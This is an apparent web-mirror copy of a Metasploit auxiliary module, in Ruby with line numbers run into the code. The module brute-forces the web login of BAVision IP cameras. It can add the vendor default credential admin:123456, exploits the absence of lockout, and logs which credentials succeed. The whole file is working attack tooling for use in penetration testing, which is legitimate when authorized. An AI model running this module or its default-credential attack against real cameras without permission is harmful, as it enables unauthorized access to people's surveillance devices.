CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/http/bavision_cam_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/login_scanner/bavision_cameras'6require 'metasploit/framework/credential_collection'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::AuthBrute11include Msf::Auxiliary::Report12include Msf::Auxiliary::Scanner1314def initialize(info={})15super(update_info(info,16'Name' => 'BAVision IP Camera Web Server Login',17'Description' => %q{18This module will attempt to authenticate to an IP camera created by BAVision via the19web service. By default, the vendor ships a default credential admin:123456 to its20cameras, and the web server does not enforce lockouts in case of a bruteforce attack.21},22'Author' => [ 'sinn3r' ],23'License' => MSF_LICENSE24))2526register_options(27[28OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:123456', false])29])30end313233def scanner(ip)34@scanner ||= lambda {35cred_collection = build_credential_collection(36username: datastore['USERNAME'],37password: datastore['PASSWORD']38)3940if datastore['TRYDEFAULT']41# Add the default username and password42print_status("Default credential admin:123456 added to the credential queue for testing.")43cred_collection.add_public('admin')44cred_collection.add_private('123456')45end4647return Metasploit::Framework::LoginScanner::BavisionCameras.new(48configure_http_login_scanner(49host: ip,50port: datastore['RPORT'],51cred_details: cred_collection,52stop_on_success: datastore['STOP_ON_SUCCESS'],53bruteforce_speed: datastore['BRUTEFORCE_SPEED'],54connection_timeout: 5,55http_username: datastore['HttpUsername'],56http_password: datastore['HttpPassword']57))58}.call59end606162def report_good_cred(ip, port, result)63service_data = {64address: ip,65port: port,66service_name: 'http',67protocol: 'tcp',68workspace_id: myworkspace_id69}7071credential_data = {72module_fullname: self.fullname,73origin_type: :service,74private_data: result.credential.private,75private_type: :password,76username: result.credential.public,77}.merge(service_data)7879login_data = {80core: create_credential(credential_data),81last_attempted_at: DateTime.now,82status: result.status,83proof: result.proof84}.merge(service_data)8586create_credential_login(login_data)87end888990def report_bad_cred(ip, rport, result)91invalidate_login(92address: ip,93port: rport,94protocol: 'tcp',95public: result.credential.public,96private: result.credential.private,97realm_key: result.credential.realm_key,98realm_value: result.credential.realm,99status: result.status,100proof: result.proof101)102end103104def bruteforce(ip)105scanner(ip).scan! do |result|106case result.status107when Metasploit::Model::Login::Status::SUCCESSFUL108print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")109report_good_cred(ip, rport, result)110when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT111vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)112report_bad_cred(ip, rport, result)113when Metasploit::Model::Login::Status::INCORRECT114vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")115report_bad_cred(ip, rport, result)116end117end118end119120def run_host(ip)121unless scanner(ip).check_setup122print_brute(:level => :error, :ip => ip, :msg => 'Target is not BAVision IP camera web server.')123return124end125126bruteforce(ip)127end128end129130131